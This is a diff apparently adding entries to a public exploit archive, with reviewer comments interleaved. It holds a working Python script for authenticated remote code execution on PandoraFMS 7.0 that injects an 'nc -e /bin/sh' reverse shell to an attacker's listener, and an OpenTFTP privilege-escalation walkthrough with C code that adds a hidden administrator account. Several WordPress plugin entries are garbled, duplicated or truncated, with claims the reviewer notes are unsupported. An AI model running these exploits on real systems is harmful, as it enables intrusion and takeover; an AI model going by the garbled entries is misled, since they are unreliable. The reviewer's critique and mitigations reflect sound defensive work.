diff --git a/exploits/php/webapps/48058.txt b/exploits/php/webapps/48058.txt
new file mode 100644
index 0000000000..81f08de2db
--- /dev/null
+++ b/exploits/php/webapps/48058.txt
@@ -0,0 +1,39 @@
+# Tile: Wordpress Plugin tutor.1.5.3 - Local File Inclusion
+# Author: mehran feizi
+# Category: webapps
+# Date: 2020-02-12
+# vendor home page: https://wordpress.org/plugins/tutor/
+
+===================================================================
+Vulnerable page:
+/instructors.php
+===================================================================
+Vulnerable Source:
+3: $sub_page = tutor_utils ()->avalue_dot('sub_page', $_GET);
+5: $include_file = tutor ()->path . "views/pages/{$sub_page}.php";
+7: include include $include_file;
+requires:
+4: if(!empty($sub_page))
+6: if(file_exists($include_file))
+===================================================================
+Exploit:
+localhost/wp-content/plugins/tutor/views/pages/instructors.php?sub_page=[LFI]
+=================================================================================
+contact me:
+telegram: @MF0584
+gmail: mehranfeizi13841384@gmail.com
+===================================================================
+Vulnerable page:
+/instructors.php
+===================================================================
+Vulnerable Source:
+3: $sub_page = tutor_utils ()->avalue_dot('sub_page', $_GET);
+5: $include_file = tutor ()->path . "views/pages/{$sub_page}.php";
+7: include include $include_file;
+requires:
+4: if(!empty($sub_page))
+6: if(file_exists($include_file))
+===================================================================
+Exploit:
+localhost/wp-content/plugins/tutor/views/pages/instructors.php?sub_page=[LFI]
+=================================================================================
\ No newline at end of file
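Review bot: The advisory body is pasted twice: the block from `Vulnerable page:` through the `Exploit:` line appears once before the `contact me:` section and again, unchanged, after it, so the second copy should be dropped. The header key is spelled `# Tile:` where `# Title:` is meant (the same typo is in 48059, 48061 and 48062). The quoted source repeats the sink name (`include include $include_file;`), and it shows `sub_page` placed between `views/pages/` and a fixed `.php` suffix behind a `file_exists()` check, which bounds what can be included. The entry should say so and record the fix, e.g. `Mitigation: restrict sub_page to an allow-list of view names before building $include_file.` Whether the view file can be reached by a direct request, as the `Exploit:` line implies, is not shown here, since `tutor_utils()` and `tutor()` are defined elsewhere.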
diff --git a/exploits/php/webapps/48059.txt b/exploits/php/webapps/48059.txt
new file mode 100644
index 0000000000..25198467ad
--- /dev/null
+++ b/exploits/php/webapps/48059.txt
@@ -0,0 +1,18 @@
+# Tile: Wordpress Plugin tutor.1.5.3 - Persistent Cross-Site Scripting
+# Author: mehran feizi
+# Category: webapps
+# Date: 2020-02-12
+# vendor home page: https://wordpress.org/plugins/tutor/
+
+===================================================================
+Vulnerable page:
+/Quiz.php
+===================================================================
+Vulnerable Source:
+473: echo echo $topic_id;
+447: $topic_id = sanitize_text_field($_POST['topic_id']);
+===================================================================
+Exploit:
+localhost/wp-content/plugins/tutor/classes/Quiz.php
+$_POST('topic_id') =
+=================================================================================
\ No newline at end of file
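Review bot: The title says Persistent Cross-Site Scripting, but the two quoted lines do not support that. They show `$_POST['topic_id']` passed through `sanitize_text_field()` at 447 and echoed at 473, apparently in the same request, which is at most a reflected flow, and `sanitize_text_field()` strips tags before the echo. The `Exploit:` section ends at `$_POST('topic_id') =` with no value and no description of the HTML context of the output, so the claim cannot be checked from this entry. I would ask for the output context of line 473 and retitle the entry unless a stored path is shown. On the plugin side the durable fix is escaping at the point of output, e.g. `echo esc_attr( $topic_id );`.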
diff --git a/exploits/php/webapps/48061.txt b/exploits/php/webapps/48061.txt
new file mode 100644
index 0000000000..257c72a7fc
--- /dev/null
+++ b/exploits/php/webapps/48061.txt
@@ -0,0 +1,14 @@
+# Tile: Wordpress Plugin wordfence.7.4.5 - Local File Disclosure
+# Author: mehran feizi
+# Category: webapps
+# Date: 2020-02-12
+# vendor home page: https://wordpress.org/plugins/wordfence/
+
+==============================================================================
+Vulnerable Source:
+5662: readfile readfile($localFile);
+5645: $localFile = ABSPATH . preg_replace('/^(?:\.\.|[\/]+)/', '', sanitize_text_field($_GET['file']));
+=================================================================================
+Exploit:
+localhost/wp-content/plugins/wordfence/lib/wordfenceClass.php?file=[LFD]
+=================================================================================
\ No newline at end of file
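Review bot: The entry quotes only the sink (`readfile($localFile)` at 5662) and the path construction at 5645, and leaves out the enclosing function and any capability or nonce check that guards it, so the severity implied by the title is not established. The `Exploit:` line requests `lib/wordfenceClass.php` directly, yet the quoted code depends on `ABSPATH` and `sanitize_text_field()`, which WordPress core provides; that suggests the code only runs inside a loaded WordPress request, presumably a privileged admin action. Please add the function name, the required privilege and the fixed version (not stated on this page). For defenders, the relevant hardening is to resolve the final path and confirm it stays under the intended directory rather than rely on the `^`-anchored `preg_replace`.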
diff --git a/exploits/php/webapps/48062.txt b/exploits/php/webapps/48062.txt
new file mode 100644
index 0000000000..a140679760
--- /dev/null
+++ b/exploits/php/webapps/48062.txt
@@ -0,0 +1,39 @@
+# Tile: Wordpress Plugin contact-form-7 5.1.6 - Remote File Upload
+# Author: mehran feizi
+# Category: webapps
+# Date: 2020-02-11
+# vendor home page: https://wordpress.org/plugins/contact-form-7/
+
+Vulnerable Source:
+134: move_uploaded_file move_uploaded_file($file['tmp_name'], $new_file))
+82: $file = $_FILES[$name] : null;
+132: $new_file = path_join($uploads_dir, $filename);
+122: $uploads_dir = wpcf7_maybe_add_random_dir($uploads_dir);
+121: $uploads_dir = wpcf7_upload_tmp_dir();
+131: $filename = wp_unique_filename($uploads_dir, $filename);
+122: $uploads_dir = wpcf7_maybe_add_random_dir($uploads_dir);
+121: $uploads_dir = wpcf7_upload_tmp_dir();
+128: $filename = apply_filters('wpcf7_upload_file_name', $filename, $file['name'], $tag);
+126: $filename = wpcf7_antiscript_file_name ($filename);
+125: $filename = wpcf7_canonicalize ($filename, 'as-is');
+124: $filename = $file['name'];
+82: $file = $_FILES[$name] : null;
+82: $file = $_FILES[$name] : null;
+78: ⇓ function wpcf7_file_validation_filter($result, $tag)
+
+
+Exploit:
+"@$shahab"));
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+$result = curl_exec($ch);
+curl_close($ch);
+print "$result";
+?>
+
+Location File:
+http://localhost/wordpress/wp-content/plugins/contact-form-7/file.jpg
\ No newline at end of file
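Review bot: The `Exploit:` section is truncated: it starts mid-statement at `"@$shahab"));` and ends with `?>`, so the opening of the PHP snippet was lost, most likely stripped as markup when the entry was submitted. The quoted trace also lists the plugin's own controls on the filename and destination (`wpcf7_antiscript_file_name()`, `wp_unique_filename()`, `wpcf7_maybe_add_random_dir()`), and the entry never says how they fail. The `Location File:` URL points at `file.jpg` directly under the plugin directory, which does not match the `wpcf7_upload_tmp_dir()` destination in the trace and, being a `.jpg`, does not show code execution. As written this reads as unverified static-analysis output. It should carry a line such as `# Status: unverified, PoC incomplete` or be held back until the author supplies a complete report.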
diff --git a/exploits/php/webapps/48064.py b/exploits/php/webapps/48064.py
new file mode 100755
index 0000000000..24fff0d582
--- /dev/null
+++ b/exploits/php/webapps/48064.py
@@ -0,0 +1,77 @@
+# Exploit Title: PANDORAFMS 7.0 - Authenticated Remote Code Execution
+# Date: 2020-02-12
+# Exploit Author: Engin Demirbilek
+# Vendor homepage: http://pandorafms.org/
+# Version: 7.0
+# Software link: https://pandorafms.org/features/free-download-monitoring-software/
+# Tested on: CentOS
+# CVE: CVE-2020-8947
+
+#!/bin/python
+'''
+PANDORAFMS 7.0 Authenticated Remote Code Execution x4
+This exploits can be edited to exploit 4x Authenticated RCE vulnerabilities exist on PANDORAFMS.
+incase default vulnerable variable won't work, change the position of payload to one of the following ip_src, dst_port, src_port
+
+Author: Engin Demirbilek
+Github: github.com/EnginDemirbilek
+CVE: CVE-2020-8947
+
+'''
+import requests
+import sys
+
+if len(sys.argv) < 6:
+ print "Usage: ./exploit.py http://url username password listenerIP listenerPort"
+ exit()
+
+url = sys.argv[1]
+user = sys.argv[2]
+password = sys.argv[3]
+payload = '";nc -e /bin/sh ' + sys.argv[4] + ' ' + sys.argv[5] + ' ' + '#'
+
+login = {
+ 'nick':user,
+ 'pass':password,
+ 'login_button':'Login'
+}
+req = requests.Session()
+print "Sendin login request ..."
+login = req.post(url+"/pandora_console/index.php?login=1", data=login)
+
+payload = {
+ 'date':"",
+ 'time':"",
+ 'period':"",
+ 'interval_length':"",
+ 'chart_type':"",
+ 'max_aggregates':"1",
+ 'address_resolution':"0",
+ 'name':"",
+ 'assign_group':"0",
+ 'filter_type':"0",
+ 'filter_id':"0",
+ 'filter_selected':"0",
+ 'ip_dst':payload,
+ 'ip_src':"",
+ 'dst_port':"",
+ 'src_port':"",
+ 'advanced_filter':"",
+ 'aggregate':"dstip",
+ 'router_ip':"",
+ 'output':"bytes",
+ 'draw_button':"Draw"
+}
+
+print "[+] Sendin exploit ..."
+
+exploit = req.post(url+"/pandora_console/index.php?sec=netf&sec2=operation/netflow/nf_live_view&pure=0",cookies=req.cookies, data=payload, headers={
+'User-Agent':'Mozilla/5.0 Gecko/20100101 Firefox/72.0',
+'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
+'Accept-Encoding':'gzip, deflate',
+'Content-Type':'application/x-www-form-urlencoded'})
+
+if exploit.status_code == 200:
+ print "[+] Everything seems ok, check your listener. If no connection established, change position of payload to ip_src, dst_port or src_port."
+else:
+ print "[-] Couldn't send the HTTP request, try again."
\ No newline at end of file
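Review bot: The header gives `# Version: 7.0` with no build number and no fixed release, so a reader cannot tell from this file whether a given console is affected; a line such as `# Fixed in: <version not stated on this page>` should be added and filled in from the vendor advisory. The docstring names four injectable fields (`ip_dst`, `ip_src`, `dst_port`, `src_port`) on the `operation/netflow/nf_live_view` POST, which is the useful part for defenders. Those fields are expected to hold addresses and port numbers, so a quote, semicolon or `#` in any of them in web or WAF logs is a strong indicator, and the server-side fix is to validate them as such before they reach a shell command. Two housekeeping points: `#!/bin/python` sits on the tenth line of the file and is therefore not a shebang, and the `print` statements make the script Python 2 only, which the header should state (`# Requires: Python 2, requests`).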
diff --git a/exploits/php/webapps/48065.txt b/exploits/php/webapps/48065.txt
new file mode 100644
index 0000000000..b16e2319f7
--- /dev/null
+++ b/exploits/php/webapps/48065.txt
@@ -0,0 +1,19 @@
+# Title : WordPress Plugin ultimate-member 2.1.3 - Local File Inclusion
+# Author : mehran feizi
+# Vendor : https://wordpress.org/plugins/ultimate-member/
+# Category : Webapps
+# Date : 2020-02-11
+# Vendor home page: https://wordpress.org/plugins/ultimate-member/
+
+Vulnerable Page:
+/class-admin-upgrade.php
+
+
+Vulnerable Source:
+354: if(empty($_POST['pack'])) else
+356: include_once include_once $this->packages_dir . DIRECTORY_SEPARATOR . $_POST['pack'] . DIRECTORY_SEPARATOR . 'init.php';
+
+
+Exploit:
+localhost/wp-content/plugins/worprees plugin bug dar/ultimate-member/includes/admin/core/class-admin-upgrade.php
+$_POST('pack')=
\ No newline at end of file
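Review bot: The `Exploit:` path contains `worprees plugin bug dar/`, which looks like a folder name from the author's own machine rather than part of the plugin's install path, and the payload line `$_POST('pack')=` is empty. The quoted sink uses `$this->packages_dir`, so it sits inside a method of the admin upgrade class; a direct request to `class-admin-upgrade.php` would not obviously reach it, and the entry shows neither the hook that calls it nor any capability or nonce check. The included name is followed by a fixed `DIRECTORY_SEPARATOR . 'init.php'`, which limits what can be loaded, and line 354 is garbled (`if(empty($_POST['pack'])) else`). Please add the calling action and the required role. The fix to record is matching `$_POST['pack']` against the list of known package directories before the `include_once`.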
diff --git a/exploits/windows/local/48060.txt b/exploits/windows/local/48060.txt
new file mode 100644
index 0000000000..2a65ef5fb6
--- /dev/null
+++ b/exploits/windows/local/48060.txt
@@ -0,0 +1,103 @@
+# Exploit Title: OpenTFTP 1.66 - Local Privilege Escalation
+# Exploit Author: boku
+# Date: 2020-02-12
+# Vendor Homepage: https://sourceforge.net/projects/tftp-server/
+# Software Link: https://sourceforge.net/projects/tftp-server/files/tftp%20server%20single%20port/OpenTFTPServerSPInstallerV1.66.exe/download
+# Version: 1.66
+# Tested On: Windows 10 (32-bit)
+
+# About:
+# "MultiThreaded TFTP Server Open Source Freeware Windows/Unix for PXEBOOT, firmware load, support tsize, blksize, timeout Server Port Ranges,
+# Block Number Rollover for Large Files. Runs as Service/daemon. Single Port version also available."
+# Downloads: 43,284 This Week - https://sourceforge.net/projects/tftp-server/
+
+# Vulnerability Details:
+# On Windows, Open TFTP Server v1.66, suffers from insecure file & folder permissions.
+# This allows a low-privilge, local attacker to escalate their permissions to Administrator;
+# by replacing the 'TFTPServer' service binary with a maliciously-crafted, binary executable.
+# The TFTP Server runs as an 'Auto_Start' Service, with 'LocalSystem' priviledges, after the
+# default installation. After the attacker has planted the malicious binary, the code will
+# be executed with System priviledges on the next boot of the windows device. See PoC below for details.
+
+## Service Information (there is also an Unquoted Service Path)
+C:\>sc qc TFTPServer
+SERVICE_NAME: TFTPServer
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 0 IGNORE
+ BINARY_PATH_NAME : C:\OpenTFTPServer\OpenTFTPServerSP.exe
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : Open TFTP Single Port Server
+ DEPENDENCIES :
+ SERVICE_START_NAME : LocalSystem
+
+## Insecure Folder Permission
+C:\OpenTFTPServer BUILTIN\Administrators:(OI)(CI)(ID)F
+ NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F
+ BUILTIN\Users:(OI)(CI)(ID)R
+ NT AUTHORITY\Authenticated Users:(ID)C
+ NT AUTHORITY\Authenticated Users:(OI)(CI)(IO)(ID)C
+
+## Insecure File/Service Permission
+C:\OpenTFTPServer\OpenTFTPServerSP.exe BUILTIN\Administrators:(I)(F)
+ NT AUTHORITY\SYSTEM:(I)(F)
+ BUILTIN\Users:(I)(RX)
+ NT AUTHORITY\Authenticated Users:(I)(M)
+
+## Local Privilege Escalation Proof of Concept
+#0. Download & install Open TFTP Server v1.66
+
+#1. Create low privileged user & change to the user
+ C:\Users\lowPrivUser>net user lowprivuser | findstr /i "Membership Name" | findstr /v "Full"
+ User name lowPrivUser
+ Local Group Memberships *Users
+ Global Group memberships *None
+ C:\>whoami
+ mycomputer\lowprivuser
+
+#2. Move the Service EXE to a new name
+ C:\OpenTFTPServer>move OpenTFTPServerSP.exe ~OpenTFTPServerSP.exe
+ 1 file(s) moved.
+
+#3. Create malicious binary on kali linux
+ 1) Download dependencies
+ root@kali# apt install gcc-mingw-w64-i686 wine64 -y
+ 2) Add Admin User C Code
+ root@kali# cat addAdmin.c
+ #include
+ int main(void){
+ system("net user hacker mypassword /add");
+ system("net localgroup Administrators hacker /add");
+ WinExec("C:\\OpenTFTPServer\\~OpenTFTPServerSP.exe",0);
+ return 0;
+ }
+ 3) Compile Code
+ root@kali# i686-w64-mingw32-gcc addAdmin.c -l ws2_32 -o OpenTFTPServerSP.exe
+
+#4. Transfer created 'OpenTFTPServerSP.exe' to the Windows Host
+
+#5. Move the created 'OpenTFTPServerSP.exe' binary to the 'C:\OpenTFTPServer\' Folder
+ C:\>move C:\Users\lowPrivUser\Desktop\OpenTFTPServerSP.exe C:\OpenTFTPServer\
+ 1 file(s) moved.
+ C:\>dir C:\OpenTFTPServer | findstr "OpenTFTPServerSP.exe"
+ 02/12/2020 05:59 PM 288,659 OpenTFTPServerSP.exe
+ 02/12/2020 06:38 PM 221,560 ~OpenTFTPServerSP.exe
+
+#6. Reboot the Computer
+
+#7. Look at that new Admin
+ C:\Users\lowPrivUser>net users hacker | findstr "Local name active"
+ User name hacker
+ Account active Yes
+ Local Group Memberships *Administrators *Users
+
+ C:\Users\lowPrivUser>net localgroup Administrators
+ Alias name Administrators
+ Comment Administrators have complete and unrestricted access to the computer/domain
+
+ Members
+ -------------------------------------------------------------------------------
+ Administrator
+ boku
+ hacker
\ No newline at end of file
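Review bot: The heading `## Service Information (there is also an Unquoted Service Path)` is not supported by the output under it: `BINARY_PATH_NAME : C:\OpenTFTPServer\OpenTFTPServerSP.exe` contains no spaces, so the missing quotes have no effect here and the parenthetical should be removed. The actual finding is the ACL: `NT AUTHORITY\Authenticated Users:(I)(M)` on the service binary and `(ID)C` on the folder, where the `(I)`/`(ID)` flags show the entries are inherited from the parent rather than set explicitly. The entry has no remediation section; I would add one along the lines of `# Mitigation: install under a directory only Administrators and SYSTEM can write, or disable inheritance on C:\OpenTFTPServer and remove the Authenticated Users modify/change entries.` For detection, the observable events in this PoC are a rename or replacement of the service executable by a non-admin account and a new member of the local Administrators group after the next boot.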
diff --git a/files_exploits.csv b/files_exploits.csv
index afe60b3e85..41822305eb 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -10957,6 +10957,7 @@ id,file,description,date,author,type,platform,port
48055,exploits/windows/local/48055.py,"MyVideoConverter Pro 3.14 - 'Output Folder' Buffer Overflow",2020-02-12,ZwX,local,windows,
48056,exploits/windows/local/48056.py,"MyVideoConverter Pro 3.14 - 'TVSeries' Buffer Overflow",2020-02-12,ZwX,local,windows,
48057,exploits/windows/local/48057.txt,"HP System Event Utility - Local Privilege Escalation",2020-02-12,hyp3rlinx,local,windows,
+48060,exploits/windows/local/48060.txt,"OpenTFTP 1.66 - Local Privilege Escalation",2020-02-13,boku,local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -42351,3 +42352,9 @@ id,file,description,date,author,type,platform,port
48040,exploits/cgi/webapps/48040.txt,"CHIYU BF430 TCP IP Converter - Stored Cross-Site Scripting",2020-02-11,Luca.Chiou,webapps,cgi,
48042,exploits/php/webapps/48042.txt,"Vanilla Forums 2.6.3 - Persistent Cross-Site Scripting",2020-02-11,"Sayak Naskar",webapps,php,
48047,exploits/php/webapps/48047.rb,"WordPress InfiniteWP - Client Authentication Bypass (Metasploit)",2020-02-11,Metasploit,webapps,php,80
+48058,exploits/php/webapps/48058.txt,"Wordpress Plugin tutor.1.5.3 - Local File Inclusion",2020-02-13,"Mehran Feizi",webapps,php,
+48059,exploits/php/webapps/48059.txt,"Wordpress Plugin tutor.1.5.3 - Persistent Cross-Site Scripting",2020-02-13,"Mehran Feizi",webapps,php,
+48061,exploits/php/webapps/48061.txt,"Wordpress Plugin wordfence.7.4.5 - Local File Disclosure",2020-02-13,"Mehran Feizi",webapps,php,
+48062,exploits/php/webapps/48062.txt,"Wordpress Plugin contact-form-7 5.1.6 - Remote File Upload",2020-02-13,"Mehran Feizi",webapps,php,
+48064,exploits/php/webapps/48064.py,"PANDORAFMS 7.0 - Authenticated Remote Code Execution",2020-02-13,"Engin Demirbilek",webapps,php,
+48065,exploits/php/webapps/48065.txt,"WordPress Plugin ultimate-member 2.1.3 - Local File Inclusion",2020-02-13,"Mehran Feizi",webapps,php,